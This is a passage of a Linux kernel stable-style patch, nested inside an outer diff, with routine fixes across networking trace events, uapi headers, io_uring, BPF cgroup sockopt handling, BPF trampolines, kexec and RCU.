+ #define OCELOT_QUIRK_PCS_PERFORMS_RATE_ADAPTATION	BIT(0)
+ #define OCELOT_QUIRK_QSGMII_PORTS_MUST_BE_UP		BIT(1)
+ 
+@@ -939,6 +944,8 @@ struct ocelot_port {
+ 	unsigned int			ptp_skbs_in_flight;
+ 	struct sk_buff_head		tx_skbs;
+ 
++	unsigned int			trap_proto;
++
+ 	u16				mrp_ring_id;
+ 
+ 	u8				ptp_cmd;
+@@ -1032,12 +1039,9 @@ struct ocelot {
+ 	u8				ptp:1;
+ 	struct ptp_clock		*ptp_clock;
+ 	struct ptp_clock_info		ptp_info;
+-	struct hwtstamp_config		hwtstamp_config;
+ 	unsigned int			ptp_skbs_in_flight;
+ 	/* Protects the 2-step TX timestamp ID logic */
+ 	spinlock_t			ts_id_lock;
+-	/* Protects the PTP interface state */
+-	struct mutex			ptp_lock;
+ 	/* Protects the PTP clock */
+ 	spinlock_t			ptp_clock_lock;
+ 	struct ptp_pin_desc		ptp_pins[OCELOT_PTP_PINS_NUM];
+diff --git a/include/trace/events/erofs.h b/include/trace/events/erofs.h
+index 4f4c44ea3a655..e095d36db9391 100644
+--- a/include/trace/events/erofs.h
++++ b/include/trace/events/erofs.h
+@@ -66,8 +66,8 @@ TRACE_EVENT(erofs_fill_inode,
+ 	TP_fast_assign(
+ 		__entry->dev		= inode->i_sb->s_dev;
+ 		__entry->nid		= EROFS_I(inode)->nid;
+-		__entry->blkaddr	= erofs_blknr(iloc(EROFS_I_SB(inode), __entry->nid));
+-		__entry->ofs		= erofs_blkoff(iloc(EROFS_I_SB(inode), __entry->nid));
++		__entry->blkaddr	= erofs_blknr(erofs_iloc(inode));
++		__entry->ofs		= erofs_blkoff(erofs_iloc(inode));
+ 	),
+ 
+ 	TP_printk("dev = (%d,%d), nid = %llu, blkaddr %u ofs %u",
+diff --git a/include/trace/events/net.h b/include/trace/events/net.h
+index da611a7aaf970..f667c76a3b022 100644
+--- a/include/trace/events/net.h
++++ b/include/trace/events/net.h
+@@ -51,7 +51,8 @@ TRACE_EVENT(net_dev_start_xmit,
+ 		__entry->network_offset = skb_network_offset(skb);
+ 		__entry->transport_offset_valid =
+ 			skb_transport_header_was_set(skb);
+-		__entry->transport_offset = skb_transport_offset(skb);
++		__entry->transport_offset = skb_transport_header_was_set(skb) ?
++			skb_transport_offset(skb) : 0;
+ 		__entry->tx_flags = skb_shinfo(skb)->tx_flags;
+ 		__entry->gso_size = skb_shinfo(skb)->gso_size;
+ 		__entry->gso_segs = skb_shinfo(skb)->gso_segs;
+diff --git a/include/trace/events/timer.h b/include/trace/events/timer.h
+index 3e8619c72f774..b4bc2828fa09f 100644
+--- a/include/trace/events/timer.h
++++ b/include/trace/events/timer.h
+@@ -158,7 +158,11 @@ DEFINE_EVENT(timer_class, timer_cancel,
+ 		{ HRTIMER_MODE_ABS_SOFT,	"ABS|SOFT"	},	\
+ 		{ HRTIMER_MODE_REL_SOFT,	"REL|SOFT"	},	\
+ 		{ HRTIMER_MODE_ABS_PINNED_SOFT,	"ABS|PINNED|SOFT" },	\
+-		{ HRTIMER_MODE_REL_PINNED_SOFT,	"REL|PINNED|SOFT" })
++		{ HRTIMER_MODE_REL_PINNED_SOFT,	"REL|PINNED|SOFT" },	\
++		{ HRTIMER_MODE_ABS_HARD,	"ABS|HARD" },		\
++		{ HRTIMER_MODE_REL_HARD,	"REL|HARD" },		\
++		{ HRTIMER_MODE_ABS_PINNED_HARD, "ABS|PINNED|HARD" },	\
++		{ HRTIMER_MODE_REL_PINNED_HARD,	"REL|PINNED|HARD" })
+ 
+ /**
+  * hrtimer_init - called when the hrtimer is initialized
+diff --git a/include/uapi/linux/affs_hardblocks.h b/include/uapi/linux/affs_hardblocks.h
+index 5e2fb8481252a..a5aff2eb5f708 100644
+--- a/include/uapi/linux/affs_hardblocks.h
++++ b/include/uapi/linux/affs_hardblocks.h
+@@ -7,42 +7,42 @@
+ /* Just the needed definitions for the RDB of an Amiga HD. */
+ 
+ struct RigidDiskBlock {
+-	__u32	rdb_ID;
++	__be32	rdb_ID;
+ 	__be32	rdb_SummedLongs;
+-	__s32	rdb_ChkSum;
+-	__u32	rdb_HostID;
++	__be32	rdb_ChkSum;
++	__be32	rdb_HostID;
+ 	__be32	rdb_BlockBytes;
+-	__u32	rdb_Flags;
+-	__u32	rdb_BadBlockList;
++	__be32	rdb_Flags;
++	__be32	rdb_BadBlockList;
+ 	__be32	rdb_PartitionList;
+-	__u32	rdb_FileSysHeaderList;
+-	__u32	rdb_DriveInit;
+-	__u32	rdb_Reserved1[6];
+-	__u32	rdb_Cylinders;
+-	__u32	rdb_Sectors;
+-	__u32	rdb_Heads;
+-	__u32	rdb_Interleave;
+-	__u32	rdb_Park;
+-	__u32	rdb_Reserved2[3];
+-	__u32	rdb_WritePreComp;
+-	__u32	rdb_ReducedWrite;
+-	__u32	rdb_StepRate;
+-	__u32	rdb_Reserved3[5];
+-	__u32	rdb_RDBBlocksLo;
+-	__u32	rdb_RDBBlocksHi;
+-	__u32	rdb_LoCylinder;
+-	__u32	rdb_HiCylinder;
+-	__u32	rdb_CylBlocks;
+-	__u32	rdb_AutoParkSeconds;
+-	__u32	rdb_HighRDSKBlock;
+-	__u32	rdb_Reserved4;
++	__be32	rdb_FileSysHeaderList;
++	__be32	rdb_DriveInit;
++	__be32	rdb_Reserved1[6];
++	__be32	rdb_Cylinders;
++	__be32	rdb_Sectors;
++	__be32	rdb_Heads;
++	__be32	rdb_Interleave;
++	__be32	rdb_Park;
++	__be32	rdb_Reserved2[3];
++	__be32	rdb_WritePreComp;
++	__be32	rdb_ReducedWrite;
++	__be32	rdb_StepRate;
++	__be32	rdb_Reserved3[5];
++	__be32	rdb_RDBBlocksLo;
++	__be32	rdb_RDBBlocksHi;
++	__be32	rdb_LoCylinder;
++	__be32	rdb_HiCylinder;
++	__be32	rdb_CylBlocks;
++	__be32	rdb_AutoParkSeconds;
++	__be32	rdb_HighRDSKBlock;
++	__be32	rdb_Reserved4;
+ 	char	rdb_DiskVendor[8];
+ 	char	rdb_DiskProduct[16];
+ 	char	rdb_DiskRevision[4];
+ 	char	rdb_ControllerVendor[8];
+ 	char	rdb_ControllerProduct[16];
+ 	char	rdb_ControllerRevision[4];
+-	__u32	rdb_Reserved5[10];
++	__be32	rdb_Reserved5[10];
+ };
+ 
+ #define	IDNAME_RIGIDDISK	0x5244534B	/* "RDSK" */
+@@ -50,16 +50,16 @@ struct RigidDiskBlock {
+ struct PartitionBlock {
+ 	__be32	pb_ID;
+ 	__be32	pb_SummedLongs;
+-	__s32	pb_ChkSum;
+-	__u32	pb_HostID;
++	__be32	pb_ChkSum;
++	__be32	pb_HostID;
+ 	__be32	pb_Next;
+-	__u32	pb_Flags;
+-	__u32	pb_Reserved1[2];
+-	__u32	pb_DevFlags;
++	__be32	pb_Flags;
++	__be32	pb_Reserved1[2];
++	__be32	pb_DevFlags;
+ 	__u8	pb_DriveName[32];
+-	__u32	pb_Reserved2[15];
++	__be32	pb_Reserved2[15];
+ 	__be32	pb_Environment[17];
+-	__u32	pb_EReserved[15];
++	__be32	pb_EReserved[15];
+ };
+ 
+ #define	IDNAME_PARTITION	0x50415254	/* "PART" */
+diff --git a/include/uapi/linux/auto_dev-ioctl.h b/include/uapi/linux/auto_dev-ioctl.h
+index 62e625356dc81..08be539605fca 100644
+--- a/include/uapi/linux/auto_dev-ioctl.h
++++ b/include/uapi/linux/auto_dev-ioctl.h
+@@ -109,7 +109,7 @@ struct autofs_dev_ioctl {
+ 		struct args_ismountpoint	ismountpoint;
+ 	};
+ 
+-	char path[0];
++	char path[];
+ };
+ 
+ static inline void init_autofs_dev_ioctl(struct autofs_dev_ioctl *in)
+diff --git a/include/uapi/linux/videodev2.h b/include/uapi/linux/videodev2.h
+index 29da1f4b4578e..45fa03882ef18 100644
+--- a/include/uapi/linux/videodev2.h
++++ b/include/uapi/linux/videodev2.h
+@@ -1693,7 +1693,7 @@ struct v4l2_input {
+ 	__u8	     name[32];		/*  Label */
+ 	__u32	     type;		/*  Type of input */
+ 	__u32	     audioset;		/*  Associated audios (bitfield) */
+-	__u32        tuner;             /*  enum v4l2_tuner_type */
++	__u32        tuner;             /*  Tuner index */
+ 	v4l2_std_id  std;
+ 	__u32	     status;
+ 	__u32	     capabilities;
+diff --git a/io_uring/io_uring.c b/io_uring/io_uring.c
+index cc35aba1e4957..38bc0073a7d43 100644
+--- a/io_uring/io_uring.c
++++ b/io_uring/io_uring.c
+@@ -2346,7 +2346,7 @@ static inline int io_cqring_wait_schedule(struct io_ring_ctx *ctx,
+ 					  struct io_wait_queue *iowq,
+ 					  ktime_t *timeout)
+ {
+-	int ret;
++	int token, ret;
+ 	unsigned long check_cq;
+ 
+ 	/* make sure we run task_work before checking for signals */
+@@ -2362,9 +2362,18 @@ static inline int io_cqring_wait_schedule(struct io_ring_ctx *ctx,
+ 		if (check_cq & BIT(IO_CHECK_CQ_DROPPED_BIT))
+ 			return -EBADR;
+ 	}
++
++	/*
++	 * Use io_schedule_prepare/finish, so cpufreq can take into account
++	 * that the task is waiting for IO - turns out to be important for low
++	 * QD IO.
++	 */
++	token = io_schedule_prepare();
++	ret = 1;
+ 	if (!schedule_hrtimeout(timeout, HRTIMER_MODE_ABS))
+-		return -ETIME;
+-	return 1;
++		ret = -ETIME;
++	io_schedule_finish(token);
++	return ret;
+ }
+ 
+ /*
+@@ -2748,7 +2757,18 @@ static __cold void io_ring_exit_work(struct work_struct *work)
+ 			/* there is little hope left, don't run it too often */
+ 			interval = HZ * 60;
+ 		}
+-	} while (!wait_for_completion_timeout(&ctx->ref_comp, interval));
++		/*
++		 * This is really an uninterruptible wait, as it has to be
++		 * complete. But it's also run from a kworker, which doesn't
++		 * take signals, so it's fine to make it interruptible. This
++		 * avoids scenarios where we knowingly can wait much longer
++		 * on completions, for example if someone does a SIGSTOP on
++		 * a task that needs to finish task_work to make this loop
++		 * complete. That's a synthetic situation that should not
++		 * cause a stuck task backtrace, and hence a potential panic
++		 * on stuck tasks if that is enabled.
++		 */
++	} while (!wait_for_completion_interruptible_timeout(&ctx->ref_comp, interval));
+ 
+ 	init_completion(&exit.completion);
+ 	init_task_work(&exit.task_work, io_tctx_exit_cb);
+@@ -2772,7 +2792,12 @@ static __cold void io_ring_exit_work(struct work_struct *work)
+ 			continue;
+ 
+ 		mutex_unlock(&ctx->uring_lock);
+-		wait_for_completion(&exit.completion);
++		/*
++		 * See comment above for
++		 * wait_for_completion_interruptible_timeout() on why this
++		 * wait is marked as interruptible.
++		 */
++		wait_for_completion_interruptible(&exit.completion);
+ 		mutex_lock(&ctx->uring_lock);
+ 	}
+ 	mutex_unlock(&ctx->uring_lock);
+diff --git a/kernel/bpf/btf.c b/kernel/bpf/btf.c
+index 8220caa488c54..fb78bb26786fc 100644
+--- a/kernel/bpf/btf.c
++++ b/kernel/bpf/btf.c
+@@ -7469,10 +7469,8 @@ int register_btf_kfunc_id_set(enum bpf_prog_type prog_type,
+ 			pr_err("missing vmlinux BTF, cannot register kfuncs\n");
+ 			return -ENOENT;
+ 		}
+-		if (kset->owner && IS_ENABLED(CONFIG_DEBUG_INFO_BTF_MODULES)) {
+-			pr_err("missing module BTF, cannot register kfuncs\n");
+-			return -ENOENT;
+-		}
++		if (kset->owner && IS_ENABLED(CONFIG_DEBUG_INFO_BTF_MODULES))
++			pr_warn("missing module BTF, cannot register kfuncs\n");
+ 		return 0;
+ 	}
+ 	if (IS_ERR(btf))
+diff --git a/kernel/bpf/cgroup.c b/kernel/bpf/cgroup.c
+index b86b907e566ca..bb70f400c25eb 100644
+--- a/kernel/bpf/cgroup.c
++++ b/kernel/bpf/cgroup.c
+@@ -1826,6 +1826,12 @@ int __cgroup_bpf_run_filter_setsockopt(struct sock *sk, int *level,
+ 		ret = 1;
+ 	} else if (ctx.optlen > max_optlen || ctx.optlen < -1) {
+ 		/* optlen is out of bounds */
++		if (*optlen > PAGE_SIZE && ctx.optlen >= 0) {
++			pr_info_once("bpf setsockopt: ignoring program buffer with optlen=%d (max_optlen=%d)\n",
++				     ctx.optlen, max_optlen);
++			ret = 0;
++			goto out;
++		}
+ 		ret = -EFAULT;
+ 	} else {
+ 		/* optlen within bounds, run kernel handler */
+@@ -1881,8 +1887,10 @@ int __cgroup_bpf_run_filter_getsockopt(struct sock *sk, int level,
+ 		.optname = optname,
+ 		.current_task = current,
+ 	};
++	int orig_optlen;
+ 	int ret;
+ 
++	orig_optlen = max_optlen;
+ 	ctx.optlen = max_optlen;
+ 	max_optlen = sockopt_alloc_buf(&ctx, max_optlen, &buf);
+ 	if (max_optlen < 0)
+@@ -1905,6 +1913,7 @@ int __cgroup_bpf_run_filter_getsockopt(struct sock *sk, int level,
+ 			ret = -EFAULT;
+ 			goto out;
+ 		}
++		orig_optlen = ctx.optlen;
+ 
+ 		if (copy_from_user(ctx.optval, optval,
+ 				   min(ctx.optlen, max_optlen)) != 0) {
+@@ -1922,6 +1931,12 @@ int __cgroup_bpf_run_filter_getsockopt(struct sock *sk, int level,
+ 		goto out;
+ 
+ 	if (optval && (ctx.optlen > max_optlen || ctx.optlen < 0)) {
++		if (orig_optlen > PAGE_SIZE && ctx.optlen >= 0) {
++			pr_info_once("bpf getsockopt: ignoring program buffer with optlen=%d (max_optlen=%d)\n",
++				     ctx.optlen, max_optlen);
++			ret = retval;
++			goto out;
++		}
+ 		ret = -EFAULT;
+ 		goto out;
+ 	}
+diff --git a/kernel/bpf/trampoline.c b/kernel/bpf/trampoline.c
+index f1504cb5b6e19..30af8f66e17b4 100644
+--- a/kernel/bpf/trampoline.c
++++ b/kernel/bpf/trampoline.c
+@@ -279,11 +279,8 @@ bpf_trampoline_get_progs(const struct bpf_trampoline *tr, int *total, bool *ip_a
+ 	return tlinks;
+ }
+ 
+-static void __bpf_tramp_image_put_deferred(struct work_struct *work)
++static void bpf_tramp_image_free(struct bpf_tramp_image *im)
+ {
+-	struct bpf_tramp_image *im;
+-
+-	im = container_of(work, struct bpf_tramp_image, work);
+ 	bpf_image_ksym_del(&im->ksym);
+ 	bpf_jit_free_exec(im->image);
+ 	bpf_jit_uncharge_modmem(PAGE_SIZE);
+@@ -291,6 +288,14 @@ static void __bpf_tramp_image_put_deferred(struct work_struct *work)
+ 	kfree_rcu(im, rcu);
+ }
+ 
++static void __bpf_tramp_image_put_deferred(struct work_struct *work)
++{
++	struct bpf_tramp_image *im;
++
++	im = container_of(work, struct bpf_tramp_image, work);
++	bpf_tramp_image_free(im);
++}
++
+ /* callback, fexit step 3 or fentry step 2 */
+ static void __bpf_tramp_image_put_rcu(struct rcu_head *rcu)
+ {
+@@ -372,7 +377,7 @@ static void bpf_tramp_image_put(struct bpf_tramp_image *im)
+ 	call_rcu_tasks_trace(&im->rcu, __bpf_tramp_image_put_rcu_tasks);
+ }
+ 
+-static struct bpf_tramp_image *bpf_tramp_image_alloc(u64 key, u32 idx)
++static struct bpf_tramp_image *bpf_tramp_image_alloc(u64 key)
+ {
+ 	struct bpf_tramp_image *im;
+ 	struct bpf_ksym *ksym;
+@@ -399,7 +404,7 @@ static struct bpf_tramp_image *bpf_tramp_image_alloc(u64 key, u32 idx)
+ 
+ 	ksym = &im->ksym;
+ 	INIT_LIST_HEAD_RCU(&ksym->lnode);
+-	snprintf(ksym->name, KSYM_NAME_LEN, "bpf_trampoline_%llu_%u", key, idx);
++	snprintf(ksym->name, KSYM_NAME_LEN, "bpf_trampoline_%llu", key);
+ 	bpf_image_ksym_add(image, ksym);
+ 	return im;
+ 
+@@ -429,11 +434,10 @@ static int bpf_trampoline_update(struct bpf_trampoline *tr, bool lock_direct_mut
+ 		err = unregister_fentry(tr, tr->cur_image->image);
+ 		bpf_tramp_image_put(tr->cur_image);
+ 		tr->cur_image = NULL;
+-		tr->selector = 0;
+ 		goto out;
+ 	}
+ 
+-	im = bpf_tramp_image_alloc(tr->key, tr->selector);
++	im = bpf_tramp_image_alloc(tr->key);
+ 	if (IS_ERR(im)) {
+ 		err = PTR_ERR(im);
+ 		goto out;
+@@ -466,13 +470,12 @@ again:
+ 					  &tr->func.model, tr->flags, tlinks,
+ 					  tr->func.addr);
+ 	if (err < 0)
+-		goto out;
++		goto out_free;
+ 
+ 	set_memory_ro((long)im->image, 1);
+ 	set_memory_x((long)im->image, 1);
+ 
+-	WARN_ON(tr->cur_image && tr->selector == 0);
+-	WARN_ON(!tr->cur_image && tr->selector);
++	WARN_ON(tr->cur_image && total == 0);
+ 	if (tr->cur_image)
+ 		/* progs already running at this address */
+ 		err = modify_fentry(tr, tr->cur_image->image, im->image, lock_direct_mutex);
+@@ -497,18 +500,21 @@ again:
+ 	}
+ #endif
+ 	if (err)
+-		goto out;
++		goto out_free;
+ 
+ 	if (tr->cur_image)
+ 		bpf_tramp_image_put(tr->cur_image);
+ 	tr->cur_image = im;
+-	tr->selector++;
+ out:
+ 	/* If any error happens, restore previous flags */
+ 	if (err)
+ 		tr->flags = orig_flags;
+ 	kfree(tlinks);
+ 	return err;
++
++out_free:
++	bpf_tramp_image_free(im);
++	goto out;
+ }
+ 
+ static enum bpf_tramp_prog_type bpf_attach_type_to_tramp(struct bpf_prog *prog)
+diff --git a/kernel/kcsan/core.c b/kernel/kcsan/core.c
+index 5a60cc52adc0c..8a7baf4e332e3 100644
+--- a/kernel/kcsan/core.c
++++ b/kernel/kcsan/core.c
+@@ -1270,7 +1270,9 @@ static __always_inline void kcsan_atomic_builtin_memorder(int memorder)
+ DEFINE_TSAN_ATOMIC_OPS(8);
+ DEFINE_TSAN_ATOMIC_OPS(16);
+ DEFINE_TSAN_ATOMIC_OPS(32);
++#ifdef CONFIG_64BIT
+ DEFINE_TSAN_ATOMIC_OPS(64);
++#endif
+ 
+ void __tsan_atomic_thread_fence(int memorder);
+ void __tsan_atomic_thread_fence(int memorder)
+diff --git a/kernel/kexec_core.c b/kernel/kexec_core.c
+index ca2743f9c634e..79c012fbb49c8 100644
+--- a/kernel/kexec_core.c
++++ b/kernel/kexec_core.c
+@@ -1035,6 +1035,7 @@ int crash_shrink_memory(unsigned long new_size)
+ 	start = crashk_res.start;
+ 	end = crashk_res.end;
+ 	old_size = (end == 0) ? 0 : end - start + 1;
++	new_size = roundup(new_size, KEXEC_CRASH_MEM_ALIGN);
+ 	if (new_size >= old_size) {
+ 		ret = (new_size == old_size) ? 0 : -EINVAL;
+ 		goto unlock;
+@@ -1046,9 +1047,7 @@ int crash_shrink_memory(unsigned long new_size)
+ 		goto unlock;
+ 	}
+ 
+-	start = roundup(start, KEXEC_CRASH_MEM_ALIGN);
+-	end = roundup(start + new_size, KEXEC_CRASH_MEM_ALIGN);
+-
++	end = start + new_size;
+ 	crash_free_reserved_phys_range(end, crashk_res.end);
+ 
+ 	if ((start == end) && (crashk_res.parent != NULL))
+diff --git a/kernel/rcu/rcu.h b/kernel/rcu/rcu.h
+index be5979da07f59..48d8f754b730e 100644
+--- a/kernel/rcu/rcu.h
++++ b/kernel/rcu/rcu.h
+@@ -583,4 +583,10 @@ void show_rcu_tasks_trace_gp_kthread(void);
+ static inline void show_rcu_tasks_trace_gp_kthread(void) {}
+ #endif
+ 
++#ifdef CONFIG_TINY_RCU
++static inline bool rcu_cpu_beenfullyonline(int cpu) { return true; }
++#else
++bool rcu_cpu_beenfullyonline(int cpu);
++#endif
++
+ #endif /* __LINUX_RCU_H */
+diff --git a/kernel/rcu/rcuscale.c b/kernel/rcu/rcuscale.c
+index 3ef02d4a81085..7854dc3226e1b 100644
+--- a/kernel/rcu/rcuscale.c
++++ b/kernel/rcu/rcuscale.c
+@@ -521,89 +521,6 @@ rcu_scale_print_module_parms(struct rcu_scale_ops *cur_ops, const char *tag)
+ 		 scale_type, tag, nrealreaders, nrealwriters, verbose, shutdown);
+ }
+ 
+-static void
+-rcu_scale_cleanup(void)
+-{
+-	int i;
+-	int j;
+-	int ngps = 0;
+-	u64 *wdp;
+-	u64 *wdpp;
+-
+-	/*
+-	 * Would like warning at start, but everything is expedited
+-	 * during the mid-boot phase, so have to wait till the end.
+-	 */
+-	if (rcu_gp_is_expedited() && !rcu_gp_is_normal() && !gp_exp)
+-		SCALEOUT_ERRSTRING("All grace periods expedited, no normal ones to measure!");
+-	if (rcu_gp_is_normal() && gp_exp)
+-		SCALEOUT_ERRSTRING("All grace periods normal, no expedited ones to measure!");
+-	if (gp_exp && gp_async)
+-		SCALEOUT_ERRSTRING("No expedited async GPs, so went with async!");
+-
+-	if (torture_cleanup_begin())
+-		return;
+-	if (!cur_ops) {
+-		torture_cleanup_end();
+-		return;
+-	}
+-
+-	if (reader_tasks) {
+-		for (i = 0; i < nrealreaders; i++)
+-			torture_stop_kthread(rcu_scale_reader,
+-					     reader_tasks[i]);
+-		kfree(reader_tasks);
+-	}
+-
+-	if (writer_tasks) {
+-		for (i = 0; i < nrealwriters; i++) {
+-			torture_stop_kthread(rcu_scale_writer,
+-					     writer_tasks[i]);
+-			if (!writer_n_durations)
+-				continue;
+-			j = writer_n_durations[i];
+-			pr_alert("%s%s writer %d gps: %d\n",
+-				 scale_type, SCALE_FLAG, i, j);
+-			ngps += j;
+-		}
+-		pr_alert("%s%s start: %llu end: %llu duration: %llu gps: %d batches: %ld\n",
+-			 scale_type, SCALE_FLAG,
+-			 t_rcu_scale_writer_started, t_rcu_scale_writer_finished,
+-			 t_rcu_scale_writer_finished -
+-			 t_rcu_scale_writer_started,
+-			 ngps,
+-			 rcuscale_seq_diff(b_rcu_gp_test_finished,
+-					   b_rcu_gp_test_started));
+-		for (i = 0; i < nrealwriters; i++) {
+-			if (!writer_durations)
+-				break;
+-			if (!writer_n_durations)
+-				continue;
+-			wdpp = writer_durations[i];
+-			if (!wdpp)
+-				continue;
+-			for (j = 0; j < writer_n_durations[i]; j++) {
+-				wdp = &wdpp[j];
+-				pr_alert("%s%s %4d writer-duration: %5d %llu\n",
+-					scale_type, SCALE_FLAG,
+-					i, j, *wdp);
+-				if (j % 100 == 0)
+-					schedule_timeout_uninterruptible(1);
+-			}
+-			kfree(writer_durations[i]);
+-		}
+-		kfree(writer_tasks);
+-		kfree(writer_durations);
+-		kfree(writer_n_durations);
+-	}
+-
+-	/* Do torture-type-specific cleanup operations.  */
+-	if (cur_ops->cleanup != NULL)
+-		cur_ops->cleanup();
+-
+-	torture_cleanup_end();
+-}
+-
+ /*
+  * Return the number if non-negative.  If -1, the number of CPUs.
+  * If less than -1, that much less than the number of CPUs, but
+@@ -623,21 +540,6 @@ static int compute_real(int n)
+ 	return nr;
+ }
+ 
+-/*
+- * RCU scalability shutdown kthread.  Just waits to be awakened, then shuts
+- * down system.
+- */
+-static int
+-rcu_scale_shutdown(void *arg)
+-{
+-	wait_event(shutdown_wq,
+-		   atomic_read(&n_rcu_scale_writer_finished) >= nrealwriters);
+-	smp_mb(); /* Wake before output. */
+-	rcu_scale_cleanup();
+-	kernel_power_off();
+-	return -EINVAL;
+-}
+-
+ /*
+  * kfree_rcu() scalability tests: Start a kfree_rcu() loop on all CPUs for number
+  * of iterations and measure total time and number of GP for all iterations to complete.
+@@ -757,8 +659,8 @@ kfree_scale_cleanup(void)
+ static int
+ kfree_scale_shutdown(void *arg)
+ {
+-	wait_event(shutdown_wq,
+-		   atomic_read(&n_kfree_scale_thread_ended) >= kfree_nrealthreads);
++	wait_event_idle(shutdown_wq,
++			atomic_read(&n_kfree_scale_thread_ended) >= kfree_nrealthreads);
+ 
+ 	smp_mb(); /* Wake before output. */
+ 
+@@ -812,6 +714,108 @@ unwind:
+ 	return firsterr;
+ }
+ 
++static void
++rcu_scale_cleanup(void)
++{
++	int i;
++	int j;
++	int ngps = 0;
++	u64 *wdp;
++	u64 *wdpp;
++
++	/*
++	 * Would like warning at start, but everything is expedited
++	 * during the mid-boot phase, so have to wait till the end.
++	 */
++	if (rcu_gp_is_expedited() && !rcu_gp_is_normal() && !gp_exp)
++		SCALEOUT_ERRSTRING("All grace periods expedited, no normal ones to measure!");
++	if (rcu_gp_is_normal() && gp_exp)
++		SCALEOUT_ERRSTRING("All grace periods normal, no expedited ones to measure!");
++	if (gp_exp && gp_async)
++		SCALEOUT_ERRSTRING("No expedited async GPs, so went with async!");
++
++	if (kfree_rcu_test) {
++		kfree_scale_cleanup();
++		return;
++	}
++
++	if (torture_cleanup_begin())
++		return;
++	if (!cur_ops) {
++		torture_cleanup_end();
++		return;
++	}
++
++	if (reader_tasks) {
++		for (i = 0; i < nrealreaders; i++)
++			torture_stop_kthread(rcu_scale_reader,
++					     reader_tasks[i]);
++		kfree(reader_tasks);
++	}
++
++	if (writer_tasks) {
++		for (i = 0; i < nrealwriters; i++) {
++			torture_stop_kthread(rcu_scale_writer,
++					     writer_tasks[i]);
++			if (!writer_n_durations)
++				continue;
++			j = writer_n_durations[i];
++			pr_alert("%s%s writer %d gps: %d\n",
++				 scale_type, SCALE_FLAG, i, j);
++			ngps += j;
++		}
++		pr_alert("%s%s start: %llu end: %llu duration: %llu gps: %d batches: %ld\n",
++			 scale_type, SCALE_FLAG,
++			 t_rcu_scale_writer_started, t_rcu_scale_writer_finished,
++			 t_rcu_scale_writer_finished -
++			 t_rcu_scale_writer_started,
++			 ngps,
++			 rcuscale_seq_diff(b_rcu_gp_test_finished,
++					   b_rcu_gp_test_started));
++		for (i = 0; i < nrealwriters; i++) {
++			if (!writer_durations)
++				break;
++			if (!writer_n_durations)
++				continue;
++			wdpp = writer_durations[i];
++			if (!wdpp)
++				continue;
++			for (j = 0; j < writer_n_durations[i]; j++) {
++				wdp = &wdpp[j];
++				pr_alert("%s%s %4d writer-duration: %5d %llu\n",
++					scale_type, SCALE_FLAG,
++					i, j, *wdp);
++				if (j % 100 == 0)
++					schedule_timeout_uninterruptible(1);
++			}
++			kfree(writer_durations[i]);
++		}
++		kfree(writer_tasks);
++		kfree(writer_durations);
++		kfree(writer_n_durations);
++	}
++
++	/* Do torture-type-specific cleanup operations.  */
++	if (cur_ops->cleanup != NULL)
++		cur_ops->cleanup();
++
++	torture_cleanup_end();
++}
++
++/*
++ * RCU scalability shutdown kthread.  Just waits to be awakened, then shuts
++ * down system.
++ */
++static int
++rcu_scale_shutdown(void *arg)
++{
++	wait_event_idle(shutdown_wq, atomic_read(&n_rcu_scale_writer_finished) >= nrealwriters);
++	smp_mb(); /* Wake before output. */
++	rcu_scale_cleanup();
++	kernel_power_off();
++	return -EINVAL;
++}
++
+ static int __init
+ rcu_scale_init(void)
+ {
+diff --git a/kernel/rcu/tasks.h b/kernel/rcu/tasks.h
+index c8409601fec38..df968321feada 100644
+--- a/kernel/rcu/tasks.h
++++ b/kernel/rcu/tasks.h
+@@ -455,6 +455,7 @@ static void rcu_tasks_invoke_cbs(struct rcu_tasks *rtp, struct rcu_tasks_percpu
+ {
+ 	int cpu;
+ 	int cpunext;
++	int cpuwq;
+ 	unsigned long flags;
+ 	int len;
+ 	struct rcu_head *rhp;
+@@ -465,11 +466,13 @@ static void rcu_tasks_invoke_cbs(struct rcu_tasks *rtp, struct rcu_tasks_percpu
+ 	cpunext = cpu * 2 + 1;
+ 	if (cpunext < smp_load_acquire(&rtp->percpu_dequeue_lim)) {
+ 		rtpcp_next = per_cpu_ptr(rtp->rtpcpu, cpunext);
+-		queue_work_on(cpunext, system_wq, &rtpcp_next->rtp_work);
++		cpuwq = rcu_cpu_beenfullyonline(cpunext) ? cpunext : WORK_CPU_UNBOUND;
++		queue_work_on(cpuwq, system_wq, &rtpcp_next->rtp_work);
+ 		cpunext++;
+ 		if (cpunext < smp_load_acquire(&rtp->percpu_dequeue_lim)) {
+ 			rtpcp_next = per_cpu_ptr(rtp->rtpcpu, cpunext);
+-			queue_work_on(cpunext, system_wq, &rtpcp_next->rtp_work);
++			cpuwq = rcu_cpu_beenfullyonline(cpunext) ? cpunext : WORK_CPU_UNBOUND;
++			queue_work_on(cpuwq, system_wq, &rtpcp_next->rtp_work);
+ 		}
+ 	}
+ 
+diff --git a/kernel/rcu/tree.c b/kernel/rcu/tree.c
+index d03122f90cc48..917a1e43f7839 100644
+--- a/kernel/rcu/tree.c
++++ b/kernel/rcu/tree.c
+@@ -4138,7 +4138,6 @@ int rcutree_prepare_cpu(unsigned int cpu)
+ 	 */
+ 	rnp = rdp->mynode;
+ 	raw_spin_lock_rcu_node(rnp);		/* irqs already disabled. */
+-	rdp->beenonline = true;	 /* We have now been online. */
+ 	rdp->gp_seq = READ_ONCE(rnp->gp_seq);
+ 	rdp->gp_seq_needed = rdp->gp_seq;
+ 	rdp->cpu_no_qs.b.norm = true;
+@@ -4165,6 +4164,16 @@ static void rcutree_affinity_setting(unsigned int cpu, int outgoing)
+ 	rcu_boost_kthread_setaffinity(rdp->mynode, outgoing);
+ }
+ 
++/*
++ * Has the specified (known valid) CPU ever been fully online?
++ */
++bool rcu_cpu_beenfullyonline(int cpu)
++{
++	struct rcu_data *rdp = per_cpu_ptr(&rcu_data, cpu);
++
++	return smp_load_acquire(&rdp->beenonline);
++}
++
+ /*
+  * Near the end of the CPU-online process.  Pretty much all services
+  * enabled, and the CPU is now very much alive.
+@@ -4223,15 +4232,16 @@ int rcutree_offline_cpu(unsigned int cpu)
+  * Note that this function is special in that it is invoked directly
+  * from the incoming CPU rather than from the cpuhp_step mechanism.
+  * This is because this function must be invoked at a precise location.
++ * This incoming CPU must not have enabled interrupts yet.
+  */
+ void rcu_cpu_starting(unsigned int cpu)
+ {
+-	unsigned long flags;
+ 	unsigned long mask;
+ 	struct rcu_data *rdp;
+ 	struct rcu_node *rnp;
+ 	bool newcpu;
+ 
++	lockdep_assert_irqs_disabled();
+ 	rdp = per_cpu_ptr(&rcu_data, cpu);
+ 	if (rdp->cpu_started)
+ 		return;
